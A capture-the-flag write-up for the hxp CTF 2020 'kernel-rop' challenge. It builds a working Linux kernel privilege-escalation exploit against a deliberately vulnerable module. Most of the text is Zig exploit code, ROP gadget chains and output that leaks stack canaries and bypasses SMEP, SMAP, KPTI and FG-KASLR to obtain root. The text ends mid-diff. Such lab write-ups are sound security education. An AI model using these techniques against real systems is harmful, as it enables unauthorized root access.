kernel-rop (hxp CTF 2020)
Description
Security is difficult, and defenses should be always taken with a grain of salt. Who would win? A buffer overflow or The Hottest Linux Defenses? Flag is in /dev/sda.
Files
Solution
We’re given the kernel image vmlinuz
and the initramfs.cpio.gz
; let’s see what we’re working with:
Bash
extract-vmlinux vmlinuz > vmlinux
file vmlinux
vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), too many section (36140)
Bash
mkdir -p initramfs; cd initramfs
zcat ../initramfs.cpio.gz | cpio -id --quiet
ls
bin
etc
hackme.ko
init
root
sbin
usr
Bash
pwn checksec ./initramfs/hackme.ko 2>&1
[*] './initramfs/hackme.ko'
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x0)
Stripped: No
Debuginfo: Yes
Let’s load hackme.ko
into IDA:
C
ssize_t __fastcall hackme_read(file *f, char *data, size_t size, loff_t *off)
{
unsigned __int64 v4; // rdx
unsigned __int64 v5; // rbx
bool v6; // zf
ssize_t result; // rax
int tmp[32]; // [rsp+0h] [rbp-A0h] BYREF
unsigned __int64 v9; // [rsp+80h] [rbp-20h]
_fentry__(f, data);
v5 = v4;
v9 = __readgsqword(0x28u);
_memcpy(hackme_buf, tmp);
if ( v5 > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096, v5);
BUG();
}
_check_object_size(hackme_buf, v5, 1LL);
v6 = copy_to_user(data, hackme_buf, v5) == 0;
result = -14LL;
if ( v6 )
return v5;
return result;
}
ssize_t __fastcall hackme_write(file *f, const char *data, size_t size, loff_t *off)
{
unsigned __int64 v4; // rdx
ssize_t v5; // rbx
int tmp[32]; // [rsp+0h] [rbp-A0h] BYREF
unsigned __int64 v8; // [rsp+80h] [rbp-20h]
_fentry__(f, data, size, off);
v5 = v4;
v8 = __readgsqword(0x28u);
if ( v4 > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL);
BUG();
}
_check_object_size(hackme_buf, v4, 0LL);
if ( copy_from_user(hackme_buf, data, v5) )
return -14LL;
_memcpy(tmp, hackme_buf, v5);
return v5;
}
Ok, a kernel module that will happily read/write in way more than it’s supposed to.
Let’s check that we do indeed smash the stack:
Zig
const std = @import("std");
pub fn main() !void {
const fd = try std.posix.open("/dev/hackme", .{ .ACCMODE = .RDWR }, 0o660);
defer std.posix.close(fd);
var buf: [40]u8 = undefined;
const bytes_read = try std.posix.read(fd, &buf);
std.debug.dumpHex(buf[0..bytes_read]);
_ = try std.posix.write(fd, "nil");
}
00007ffd2da7aa00 20 80 5F 07 80 88 FF FF E0 0F 00 00 00 00 00 00 ._.............
00007ffd2da7aa10 00 E6 F6 3F FF 6D FB F3 10 68 CA 06 80 88 FF FF ...?.m...h......
00007ffd2da7a9f0 68 FE 1B 00 00 C9 FF FF h.......
[ 1.539980] Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: hackme_write+0xae/0xc0 [hackme]
[ 1.540395] CPU: 0 PID: 112 Comm: exploit Tainted: G O 5.9.0-rc6+ #10
[ 1.540600] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
[ 1.540865] Call Trace:
[ 1.541476] dump_stack+0x74/0x92
[ 1.541560] panic+0xfe/0x2e3
[ 1.541641] ? hackme_write+0xae/0xc0 [hackme]
[ 1.541704] __stack_chk_fail+0x14/0x20
[ 1.541757] hackme_write+0xae/0xc0 [hackme]
[ 1.541840] ? ksys_write+0xa7/0xe0
[ 1.541910] ? exit_to_user_mode_prepare+0x31/0x180
[ 1.541975] ? __x64_sys_write+0x1a/0x20
[ 1.542036] ? do_syscall_64+0x37/0x80
[ 1.542111] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1.542666] Kernel Offset: disabled
[ 1.542945] Rebooting in 1 seconds..
Sanity check complete.
Now let’s leak that pesky stack canary! According to IDA there’s nothing below int tmp[32] on the stack (besides the frame pointer), so the offset should be 4 * 32 + 8.
Pro tip: You can debug kernel modules under GDB by adding the offset of a particular function or instruction to the base address of said module, which can be found in /proc/modules.
Zig
var buf: [4*32+8]u8 = undefined;
_ = try std.posix.read(fd, &buf);
std.mem.reverse(u8, buf[buf.len-8..]);
std.debug.print("Stack canary is 0x{s}\n", .{std.fmt.bytesToHex(buf[buf.len-8..], .lower)});
Stack canary is 0x1c55bfc54ff0b200
Let’s check if we can do a simple ret2win:
Zig
const tmp_size = @sizeOf(i32) * 32;
fn bigEndianify(comptime len: usize, buf: []const u8) [len]u8 {
var bufLE: [len]u8 = undefined;
inline for (0..len) |i| bufLE[i] = buf[len-1-i];
return bufLE;
}
var __spinlock: bool = false;
inline fn spin() void {
while (true) if (__spinlock) break;
}
fn leakCanary(fd: std.posix.fd_t) !u64 {
var buf: [tmp_size + 8]u8 = undefined;
_ = try std.posix.read(fd, &buf);
return std.mem.bytesAsValue(u64, buf[tmp_size..]).*;
}
fn ret2win() void {
// i don't understand why, but this doesn't work (for an unpriviledged shell)
// std.debug.print("[INFO] You won!!\n", .{});
// const argv = [_:null]?[*:0]const u8{"/usr/bin/whoami"};
// switch (std.posix.execveZ(argv[0].?, argv[0..argv.len], &[_:null]?[*:0]const u8{})) {
// else => unreachable,
// }
asm volatile("int3; nop");
}
fn exploit(fd: std.posix.fd_t) !void {
const ret = std.mem.asBytes(&@intFromPtr(&ret2win));
std.debug.print("[INFO] Address of ret2win is 0x{s}\n", .{std.fmt.bytesToHex(bigEndianify(8, @constCast(ret)), .lower)});
const canary = try leakCanary(fd);
std.debug.print("[INFO] Stack canary is 0x{s}\n", .{std.fmt.bytesToHex(bigEndianify(8, @constCast(std.mem.asBytes(&canary))), .lower)});
const payload =
&[_]u8{0} ** tmp_size ++
std.mem.asBytes(&canary) ++
&[_]u8{0} ** (8 * 3) ++
ret;
_ = try std.posix.write(fd, payload);
}
[INFO] Address of ret2win is 0x00000000010251b0
[INFO] Stack canary is 0x5d0897751cd5fe00
[ 2.480911] int3: 0000 [#1] SMP NOPTI
[ 2.480961] CPU: 0 PID: 112 Comm: exploit Tainted: G O 5.9.0-rc6+ #10
[ 2.480966] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
[ 2.480968] RIP: 0010:0x10251b1
[ 2.480970] Code: Bad RIP value.
[ 2.481005] RSP: 0018:ffffc900001bfeb0 EFLAGS: 00000296
[ 2.481028] RAX: 00000000000000a8 RBX: 0000000000000000 RCX: 0000000000000000
[ 2.481031] RDX: 0000000000000008 RSI: ffffffffc00024e0 RDI: ffffc900001bfea8
[ 2.481034] RBP: 0000000000000000 R08: 00000000010251b0 R09: 00000000010251b0
[ 2.481037] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
[ 2.481039] R13: ffffc900001bfef0 R14: 00007ffe920c3488 R15: ffff8880060c8600
[ 2.481042] FS: 0000000000000000(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 2.481045] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.481048] CR2: 000000000101fe20 CR3: 0000000006164000 CR4: 00000000000006f0
[ 2.481050] Call Trace:
[ 2.481052] ? ksys_write+0xa7/0xe0
[ 2.481054] ? exit_to_user_mode_prepare+0x31/0x180
[ 2.481056] ? __x64_sys_write+0x1a/0x20
[ 2.481058] ? do_syscall_64+0x37/0x80
[ 2.481061] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 2.481063] Modules linked in: hackme(O)
[ 2.485064] ---[ end trace 32df1ad37c4c8194 ]---
[ 2.485072] RIP: 0010:0x10251b1
[ 2.485075] Code: Bad RIP value.
[ 2.485078] RSP: 0018:ffffc900001bfeb0 EFLAGS: 00000296
[ 2.485091] RAX: 00000000000000a8 RBX: 0000000000000000 RCX: 0000000000000000
[ 2.485093] RDX: 0000000000000008 RSI: ffffffffc00024e0 RDI: ffffc900001bfea8
[ 2.485096] RBP: 0000000000000000 R08: 00000000010251b0 R09: 00000000010251b0
[ 2.485098] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
[ 2.485101] R13: ffffc900001bfef0 R14: 00007ffe920c3488 R15: ffff8880060c8600
[ 2.485103] FS: 0000000000000000(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 2.485106] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.485108] CR2: 000000000101fe20 CR3: 0000000006164000 CR4: 00000000000006f0
[ 2.485111] Kernel panic - not syncing: Fatal exception in interrupt
[ 2.485661] Kernel Offset: disabled
Nice.
ret2usr
For priviledge escalation, we’ll create a new set of root credentials with prepare_kernel_cred(NULL) and overwrite the process’s existing cred struct with commit_creds().1
Bash
cat /proc/kallsyms | grep -e 'prepare_kernel_cred' -e 'commit_creds'
ffffffff814c6410 T commit_creds
ffffffff814c67f0 T prepare_kernel_cred
ffffffff81f87d90 r __ksymtab_commit_creds
ffffffff81f8d4fc r __ksymtab_prepare_kernel_cred
ffffffff81fa0972 r __kstrtab_commit_creds
ffffffff81fa09b2 r __kstrtab_prepare_kernel_cred
ffffffff81fa4d42 r __kstrtabns_commit_creds
ffffffff81fa4d42 r __kstrtabns_prepare_kernel_cred
Additionally, we need to swap to userland before we pop a shell; this can be accomplished by saving the state of registers before interacting with the hackme
driver, then calling swapgs/iretq to context switch back to userland.
Zig
export var user_cs: u64 = 0;
export var user_ss: u64 = 0;
export var user_rsp: u64 = 0;
export var user_rflags: u64 = 0;
fn saveState() callconv(.C) void {
asm volatile (
\\.intel_syntax noprefix
\\mov user_cs, cs
\\mov user_ss, ss
\\mov user_rsp, rsp
\\pushf
\\pop qword ptr user_rflags
\\.att_syntax
);
}
fn escalate() callconv(.C) void {
asm volatile (
\\.intel_syntax noprefix
\\xor rdi, rdi
\\movabs rcx, 0xffffffff814c67f0
\\call rcx
\\mov rdi, rax
\\movabs rcx, 0xffffffff814c6410
\\call rcx
\\swapgs
\\mov r15, user_ss
\\push r15
\\mov r15, user_rsp
\\push r15
\\mov r15, user_rflags
\\push r15
\\mov r15, user_cs
\\push r15
\\mov r15, user_rip
\\push r15
\\iretq
\\.att_syntax
);
}
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x4876ab567c920000
[INFO] You won!!
whoami: unknown uid 0
SMEP
Supervisor mode execution protection is kinda like the NX bit: when we’re in the kernel, userland pages are marked as non-executable. So instead of just calling ret2win we have to use ROP to pop a shell.
Bash
ropr --range=0xffffffff81000000-0xffffffff81b00000 -R '^swapgs|^iretq|^pop rdi; ret|^mov rdi, rax; (mov|ret)' vmlinux
0xffffffff81005245: mov rdi, rax; mov rdx, [rsp+8]; mov rax, [rsp]; add rsp, 0x18; jmp rdi;
0xffffffff8100a557: swapgs; rdgsbase rax; swapgs; pop rbp; ret;
0xffffffff8100a590: swapgs; wrgsbase rdi; swapgs; pop rbp; ret;
0xffffffff81200000: swapgs; sysretq;
0xffffffff812016d1: swapgs; sysret;
0xffffffff8140867f: mov rdi, rax; mov rdx, rcx; shl rdx, 6; add rdx, rcx; mov byte ptr [rax+rdx*4+0x104], 0; call qword ptr [0xffffffff82040220];
0xffffffff8146d4e4: swapgs; pop rbp; ret;
0xffffffff815e8db8: pop rdi; ret 0x4100;
0xffffffff81612872: mov rdi, rax; mov [rdx], r15; call qword ptr [0xffffffff82040220];
0xffffffff816bf203: mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
0xffffffff816df01e: mov rdi, rax; mov [r15+0x50], edx; call qword ptr [0xffffffff82040220];
0xffffffff8177020d: mov rdi, rax; mov rcx, [r10+0x148]; mov rdx, [r10+0x150]; call qword ptr [0xffffffff82040220];
0xffffffff817aaccb: mov rdi, rax; mov [r8+0x98], rsi; mov [rbp-0x78], rdx; call qword ptr [0xffffffff82040220];
0xffffffff818040d9: mov rdi, rax; mov rdx, [rdx+0x30]; mov r8, [rdx+0x40]; call qword ptr [0xffffffff82040220];
0xffffffff818f8495: mov rdi, rax; mov qword ptr [rdi], 1; pop rbp; ret;
0xffffffff8196258d: pop rdi; ret 0;
0xffffffff819c67c7: iretq;
0xffffffff819c6839: iretq;
0xffffffff819c68f6: iretq;
0xffffffff819ce301: pop rdi; ret 0xffff;
0xffffffff81a68c0d: pop rdi; ret;
0xffffffff81a77188: pop rdi; ret 0xb8ff;
0xffffffff81adf905: iretq;
Through trial and error I determined that gadgets roughly past 0xffffffff81b00000
were in a non-executable segment, so I restricted the search to reflect that.
Also, trying to use an allocator (including FixedBufferAllocator) to assist in constructing the payload led to confusing protection fault bugs, so beware of that.
Zig
const POP_RDI: u64 = 0xffffffff8196258d;
const MOV_RDI_RAX_POP_RBP: u64 = 0xffffffff816bf203;
const SWAPGS_POP_RBP: u64 = 0xffffffff8146d4e4;
const IRETQ: u64 = 0xffffffff819c67c7;
const PREPARE_KERNEL_CRED: u64 = 0xffffffff814c67f0;
const COMMIT_CREDS: u64 = 0xffffffff814c6410;
fn ropchain(writer: anytype) !void {
try writer.writeAll(std.mem.asBytes(&[_]u64{
POP_RDI,
0,
PREPARE_KERNEL_CRED,
MOV_RDI_RAX_POP_RBP,
0, // junk
COMMIT_CREDS,
SWAPGS_POP_RBP,
0, // junk
IRETQ,
user_rip,
user_cs,
user_rflags,
user_rsp,
user_ss,
}));
}
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x9866a26a8b9ba300
[INFO] You won!!
whoami: unknown uid 0
SMAP
With supervisor mode access protection we can not only not execute code in userspace, but not even read or write to it. Because our ROP chain is contained in kernelspace, we are able to escalate priviledges and context switch to userspace without reading from userland memory, so no issues here!
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x9a56f4945c848500
[INFO] You won!!
whoami: unknown uid 0
(One possible solve that works under SMEP but not SMAP involves stack pivoting to a page in userspace.)
KPTI
Kernel page-table isolation is a mitigation that results in different page tables being used when in user-mode or kernel-mode, and it was introduced to combat the Meltdown attack.
The previous exploit will not work because even though we context switch to userspace, we are still using kernel page tables and so ret2win is inaccessible. So in addition to context switching to userland, we also need to swap page tables.
This can be accomplished by a KPTI trampoline, which is very similar to our context switching gadget except that it also modifies the CR3
register to swap page tables.
Bash
cat /proc/kallsyms | grep -e 'swapgs_restore_regs_and_return_to_usermode'
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode
Bash
objdump --start-address=0xffffffff81200f26 --stop-address=0xffffffff81200f46 -S vmlinux
objdump --start-address=0xffffffff81200f89 --stop-address=0xffffffff81200f97 -S vmlinux
objdump --start-address=0xffffffff8146d4e0 --stop-address=0xffffffff8146d4e9 -S vmlinux
objdump --start-address=0xffffffff81200f46 --stop-address=0xffffffff81200f4b -S vmlinux
objdump --start-address=0xffffffff81201067 --stop-address=0xffffffff81201082 -S vmlinux
objdump --start-address=0xffffffff81200fc7 --stop-address=0xffffffff81200fc9 -S vmlinux
vmlinux: file format elf64-x86-64
Disassembly of section .text:
ffffffff81000000 <_stext>:
ffffffff81200f26: 48 89 e7 movq %rsp, %rdi
ffffffff81200f29: 65 48 8b 24 25 04 60 00 00 movq %gs:0x6004, %rsp
ffffffff81200f32: ff 77 30 pushq 0x30(%rdi)
ffffffff81200f35: ff 77 28 pushq 0x28(%rdi)
ffffffff81200f38: ff 77 20 pushq 0x20(%rdi)
ffffffff81200f3b: ff 77 18 pushq 0x18(%rdi)
ffffffff81200f3e: ff 77 10 pushq 0x10(%rdi)
ffffffff81200f41: ff 37 pushq (%rdi)
ffffffff81200f43: 50 pushq %rax
ffffffff81200f44: eb 43 jmp 0xffffffff81200f89 <_stext+0x200f89>
ffffffff81000000 <_stext>:
ffffffff81200f89: 58 popq %rax
ffffffff81200f8a: 5f popq %rdi
ffffffff81200f8b: ff 15 f7 f0 e3 00 callq *0xe3f0f7(%rip) # 0xffffffff82040088
ffffffff81200f91: ff 25 e9 f0 e3 00 jmpq *0xe3f0e9(%rip) # 0xffffffff82040080
ffffffff8146d4e0 <.text.native_swapgs>:
ffffffff8146d4e0: 55 pushq %rbp
ffffffff8146d4e1: 48 89 e5 movq %rsp, %rbp
ffffffff8146d4e4: 0f 01 f8 swapgs
ffffffff8146d4e7: 5d popq %rbp
ffffffff8146d4e8: c3 retq
ffffffff81000000 <_stext>:
ffffffff81200f46: 0f 20 df movq %cr3, %rdi
ffffffff81200f49: eb 34 jmp 0xffffffff81200f7f <_stext+0x200f7f>
ffffffff81000000 <_stext>:
ffffffff81201067: 48 81 cf 00 10 00 00 orq $0x1000, %rdi # imm = 0x1000
ffffffff8120106e: 0f 22 df movq %rdi, %cr3
ffffffff81201071: 58 popq %rax
ffffffff81201072: ff 15 10 f0 e3 00 callq *0xe3f010(%rip) # 0xffffffff82040088
ffffffff81201078: 5f popq %rdi
ffffffff81201079: 48 89 c4 movq %rax, %rsp
ffffffff8120107c: 58 popq %rax
ffffffff8120107d: e9 45 ff ff ff jmp 0xffffffff81200fc7 <_stext+0x200fc7>
ffffffff81000000 <_stext>:
ffffffff81200fc7: 48 cf iretq
Zig
const POP_RDI: u64 = 0xffffffff8196258d;
const MOV_RDI_RAX_POP_RBP: u64 = 0xffffffff816bf203;
const KPTI_TRAMPOLINE: u64 = 0xffffffff81200f26;
const PREPARE_KERNEL_CRED: u64 = 0xffffffff814c67f0;
const COMMIT_CREDS: u64 = 0xffffffff814c6410;
fn ropchain(writer: anytype) !void {
try writer.writeAll(std.mem.asBytes(&[_]u64{
POP_RDI,
0,
PREPARE_KERNEL_CRED,
MOV_RDI_RAX_POP_RBP,
0, // junk
COMMIT_CREDS,
KPTI_TRAMPOLINE,
0, // junk
0, // junk
user_rip,
user_cs,
user_rflags,
user_rsp,
user_ss,
}));
}
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0xeabc83c7a6ad8500
[INFO] You won!!
whoami: unknown uid 0
Alternate solve: Signal Handlers
The SMEP+SMAP solve will segfault in userland when KPTI is enabled; instead of using a KPTI trampoline to switch to userland page tables, we can register a signal handler (in userland) for SIGSEGV
and the kernel will do the switch for us.
Zig
const std = @import("std");
export var user_rip: u64 = undefined;
fn ret2win(_: i32) callconv(.C) void {
std.debug.print("[INFO] You won!!\n", .{});
const args = [_:null]?[*:0]const u8{"/usr/bin/whoami"};
const env = [_:null]?[*:0]u8{};
switch (std.posix.execveZ("/usr/bin/whoami", args[0..args.len], env[0..env.len])) {
else => unreachable,
}
}
fn catch_sigsegv() void {
const sigact = std.posix.Sigaction{
.handler = .{ .handler = ret2win },
.mask = std.posix.empty_sigset,
.flags = 0,
};
std.posix.sigaction(std.posix.SIG.SEGV, &sigact, null);
}
pub fn main() !void {
catch_sigsegv();
user_rip = @intFromPtr(&ret2win);
saveState();
std.debug.print("[INFO] Saved state\n", .{});
const fd = try std.posix.open("/dev/hackme", .{ .ACCMODE = .RDWR }, 0o660);
defer std.posix.close(fd);
const canary = try leakCanary(fd);
std.debug.print("[INFO] Canary: 0x{s}\n", .{std.fmt.bytesToHex(bigEndianify(8, @constCast(std.mem.asBytes(&canary))), .lower)});
const file = (std.fs.File{ .handle = fd }).writer();
var bw = std.io.bufferedWriter(file);
const writer = bw.writer();
try writer.writeByteNTimes(0, tmp_size);
try writer.writeAll(std.mem.asBytes(&canary));
try writer.writeByteNTimes(0, (8*3));
try ropchain(writer);
try bw.flush();
unreachable;
}
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x10f9df0cd1e27500
[INFO] You won!!
whoami: unknown uid 0
KASLR
Time for the final challenge: fine-grained kernel address space layout randomization (FG-KASLR).
Unlike regular (K)ASLR, a single leak is not enough to find the addresses of all symbols—we must get more creative to find the addresses of certain parts of our payload.
Fortunately not all symbols are affected by the fine-grained (or function granular?) part of KASLR:
Bash
cat /proc/kallsyms | grep -e 'startup_64' -e 'swapgs_restore_regs_and_return_to_usermode' -e 'prepare_kernel_cred' -e 'commit_creds'
ffffffff95200000 T startup_64
ffffffff95200030 T secondary_startup_64
ffffffff952001f0 T __startup_64
ffffffff95400f10 T swapgs_restore_regs_and_return_to_usermode
ffffffff95987a80 T commit_creds
ffffffff95b00e00 T prepare_kernel_cred
ffffffff96187d90 r __ksymtab_commit_creds
ffffffff9618d4fc r __ksymtab_prepare_kernel_cred
ffffffff961a0972 r __kstrtab_commit_creds
ffffffff961a09b2 r __kstrtab_prepare_kernel_cred
ffffffff961a4d42 r __kstrtabns_prepare_kernel_cred
ffffffff961a4d42 r __kstrtabns_commit_creds
Bash
# reboot and run again
cat /proc/kallsyms | grep -e 'startup_64' -e 'swapgs_restore_regs_and_return_to_usermode' -e 'prepare_kernel_cred' -e 'commit_creds'
ffffffff90000000 T startup_64
ffffffff90000030 T secondary_startup_64
ffffffff900001f0 T __startup_64
ffffffff90200f10 T swapgs_restore_regs_and_return_to_usermode
ffffffff90741cf0 T commit_creds
ffffffff908b7880 T prepare_kernel_cred
ffffffff90f87d90 r __ksymtab_commit_creds
ffffffff90f8d4fc r __ksymtab_prepare_kernel_cred
ffffffff90fa0972 r __kstrtab_commit_creds
ffffffff90fa09b2 r __kstrtab_prepare_kernel_cred
ffffffff90fa4d42 r __kstrtabns_prepare_kernel_cred
ffffffff90fa4d42 r __kstrtabns_commit_creds
Python
ksyms1 = {
0xffffffff95200000: "startup_64",
0xffffffff95200030: "secondary_startup_64",
0xffffffff952001f0: "__startup_64",
0xffffffff95400f10: "swapgs_restore_regs_and_return_to_usermode",
0xffffffff95987a80: "commit_creds",
0xffffffff95b00e00: "prepare_kernel_cred",
0xffffffff96187d90: "__ksymtab_commit_creds",
0xffffffff9618d4fc: "__ksymtab_prepare_kernel_cred",
0xffffffff961a0972: "__kstrtab_commit_creds",
0xffffffff961a09b2: "__kstrtab_prepare_kernel_cred",
0xffffffff961a4d42: "__kstrtabns_prepare_kernel_cred",
0xffffffff961a4d42: "__kstrtabns_commit_creds",
}
ksyms2 = {
0xffffffff90000000: "startup_64",
0xffffffff90000030: "secondary_startup_64",
0xffffffff900001f0: "__startup_64",
0xffffffff90200f10: "swapgs_restore_regs_and_return_to_usermode",
0xffffffff90741cf0: "commit_creds",
0xffffffff908b7880: "prepare_kernel_cred",
0xffffffff90f87d90: "__ksymtab_commit_creds",
0xffffffff90f8d4fc: "__ksymtab_prepare_kernel_cred",
0xffffffff90fa0972: "__kstrtab_commit_creds",
0xffffffff90fa09b2: "__kstrtab_prepare_kernel_cred",
0xffffffff90fa4d42: "__kstrtabns_prepare_kernel_cred",
0xffffffff90fa4d42: "__kstrtabns_commit_creds",
}
diff = 0
invariants = []
for ((addr1, sym), addr2) in zip(ksyms1.items(), ksyms2.keys()):
if sym == "startup_64":
diff = addr1-addr2
else:
if (addr1-addr2) == diff:
invariants.append(sym)
print(f"{invariants} left invariant under FG-KASLR")
['secondary_startup_64', '__startup_64', 'swapgs_restore_regs_and_return_to_usermode', '__ksymtab_commit_creds', '__ksymtab_prepare_kernel_cred', '__kstrtab_commit_creds', '__kstrtab_prepare_kernel_cred', '__kstrtabns_commit_creds'] left invariant under FG-KASLR
prepare_kernel_cred and commit_creds are affected by FG-KASLR, but the KPTI trampoline, __ksymtab_commit_creds and __ksymtab_prepare_kernel_cred are fine.
What is __ksymtab? There needs to be some way for kernel modules to be able to see symbols exported by the kernel or other kernel modules, so ksymtab is a struct (which has an address that is a fixed offset from the kernel base address) that stores information about a symbol, such as the address offset relative to the corresponding ksymtab struct.2 So if we get the address of __ksymtab_commit_creds and then add __ksymtab_commit_creds.value_offset3 to it, we get the address of commit_creds.
With that in mind, let’s find gadgets to build our payload (restricting our search to the beginning of the kernel which, as we observed earlier, is not affected by FG-KASLR, just regular KASLR).
Bash
ropr --range=0xffffffff81000000-0xffffffff81400dc6 -R '^(pop rdi;|pop rax;|pop rbx;|pop rdx;|push rax;|mov eax, \[rax+.{3,5}\]; .*|add (r|e)ax, (r|e)di;) ret;' vmlinux
0xffffffff81004aae: mov eax, [rax+0x10]; pop rbp; ret;
0xffffffff81004d11: pop rax; ret;
0xffffffff81006123: push rax; ret;
0xffffffff810075d0: pop rbx; ret;
0xffffffff81007616: pop rdx; ret;
0xffffffff8100767c: pop rdi; ret;
0xffffffff8100dad3: mov eax, [rax+0xe0]; pop rbp; shr eax, 1; and eax, 1; ret;
0xffffffff81012551: add rax, rdi; ret;
0xffffffff81012552: add eax, edi; ret;
I couldn’t find a way to move the result of prepare_kernel_cred(0) into rdi
with the gadgets we have to work with, so I opted to split the payload into 2 pieces.
Zig
var POP_RDI: u64 = 0xffffffff8100767c;
var POP_RAX: u64 = 0xffffffff81004d11;
var POP_RBX: u64 = 0xffffffff810075d0;
var POP_RDX: u64 = 0xffffffff81007616;
var PUSH_RAX: u64 = 0xffffffff81006123;
var MOV_EAX_ADDROF_RAX_PLUS_16_POP_RBP: u64 = 0xffffffff81004aae;
var ADD_RAX_RDI: u64 = 0xffffffff81012551;
var ADD_EAX_EDI: u64 = 0xffffffff81012552;
var KPTI_TRAMPOLINE: u64 = 0xffffffff81200f26;
var KSYMTAB_PREPARE_KERNEL_CRED: u64 = 0xffffffff81f8d4fc;
var KSYMTAB_COMMIT_CREDS: u64 = 0xffffffff81f87d90;
fn ropchain1(writer: anytype, fd: std.posix.fd_t, canary: u64) !void {
try writer.writeAll(std.mem.asBytes(&[_]u64{
POP_RAX,
KSYMTAB_PREPARE_KERNEL_CRED-0x10,
MOV_EAX_ADDROF_RAX_PLUS_16_POP_RBP,
0, // junk
POP_RDI,
KSYMTAB_PREPARE_KERNEL_CRED,
ADD_EAX_EDI,
POP_RDI,
(KSYMTAB_PREPARE_KERNEL_CRED >> 32) << 32,
ADD_RAX_RDI,
POP_RDI,
0,
PUSH_RAX,
POP_RBX,
@as(u64, @intCast(fd)),
POP_RDX,
canary,
KPTI_TRAMPOLINE,
0, // junk
0, // junk
@intFromPtr(&ret2ROP),
user_cs,
user_rflags,
user_rsp,
user_ss,
}));
}
fn ret2ROP() void {
const creds: u64 = asm volatile("" : [ret] "={rax}" (-> u64));
const fd: u64 = asm volatile("" : [fd] "={rbx}" (-> u64));
const canary: u64 = asm volatile("" : [canary] "={rdx}" (-> u64));
runROPChain(@as(std.posix.fd_t, @intCast(fd)), canary, creds) catch unreachable;
unreachable;
}
fn ropchain2(writer: anytype, creds_addr: u64) !void {
try writer.writeAll(std.mem.asBytes(&[_]u64{
POP_RAX,
KSYMTAB_COMMIT_CREDS-0x10,
MOV_EAX_ADDROF_RAX_PLUS_16_POP_RBP,
0, // junk
POP_RDI,
KSYMTAB_COMMIT_CREDS,
ADD_EAX_EDI,
POP_RDI,
(KSYMTAB_COMMIT_CREDS >> 32) << 32,
ADD_RAX_RDI,
POP_RDI,
creds_addr,
PUSH_RAX,
KPTI_TRAMPOLINE,
0, // junk
0, // junk
@intFromPtr(&ret2win),
user_cs,
user_rflags,
user_rsp,
user_ss,
}));
}
const ROPChain = union(enum) {
canary: u64,
creds_addr: u64,
};
fn runROPChain(fd: std.posix.fd_t, canary: u64, creds_addr: ?u64) !void {
const file = (std.fs.File{ .handle = fd }).writer();
var bw = std.io.bufferedWriter(file);
const writer = bw.writer();
try writer.writeByteNTimes(0, tmp_size);
try writer.writeAll(std.mem.asBytes(&canary));
try writer.writeByteNTimes(0, (8*3));
if (creds_addr) |caddr| {
ropchain2(writer, caddr);
} else {
ropchain1(writer, fd, canary);
}
try bw.flush();
unreachable;
}
fn adjust_offsets(kaslr_offset: u64) void {
const gadgets = &[_]*u64{
&POP_RDI,
&POP_RAX,
&POP_RBX,
&POP_RDX,
&PUSH_RAX,
&MOV_EAX_ADDROF_RAX_PLUS_16_POP_RBP,
&ADD_RAX_RDI,
&ADD_EAX_EDI,
&KPTI_TRAMPOLINE,
&KSYMTAB_PREPARE_KERNEL_CRED,
&KSYMTAB_COMMIT_CREDS,
};
for (gadgets) |g| {
g.* += kaslr_offset;
}
}
Now we just need a leak to defeat regular KASLR.
Zig
fn dumpStack(fd: std.posix.fd_t) !void {
var buf: [350]u8 = undefined;
const bytes_read = try std.posix.read(fd, &buf);
std.debug.dumpHex(buf[0..bytes_read]);
}
Let’s compare the output of dumpStack before and after a reboot to see what remains the same:
Diff
1,22c1,22
< 00007ffccba8e082 20 10 60 87 D3 8C FF FF E0 0F 00 00 00 00 00 00 .`.............
< 00007ffccba8e092 00 7D 35 B9 68 99 63 84 10 D6 CA 86 D3 8C FF FF .}5.h.c.........
< 00007ffccba8e0a2 68 FE 1B 80 1A B9 FF FF 04 00 00 00 00 00 00 00 h...............
< 00007ffccba8e0b2 00 D6 CA 86 D3 8C FF FF F0 FE 1B 80 1A B9 FF FF ................
< 00007ffccba8e0c2 00 D6 CA 86 D3 8C FF FF 80 FE 1B 80 1A B9 FF FF ................
< 00007ffccba8e0d2 D7 7B E8 A3 FF FF FF FF D7 7B E8 A3 FF FF FF FF .{.......{......
< 00007ffccba8e0e2 00 D6 CA 86 D3 8C FF FF 00 00 00 00 00 00 00 00 ................
< 00007ffccba8e0f2 82 E0 A8 CB FC 7F 00 00 A0 FE 1B 80 1A B9 FF FF ................
< 00007ffccba8e102 00 7D 35 B9 68 99 63 84 5E 01 00 00 00 00 00 00 .}5.h.c.^.......
< 00007ffccba8e112 00 00 00 00 00 00 00 00 D8 FE 1B 80 1A B9 FF FF ................
< 00007ffccba8e122 2F 28 09 A4 FF FF FF FF 00 D6 CA 86 D3 8C FF FF /(␉.............
< 00007ffccba8e132 00 D6 CA 86 D3 8C FF FF 82 E0 A8 CB FC 7F 00 00 ................
< 00007ffccba8e142 5E 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ^...............
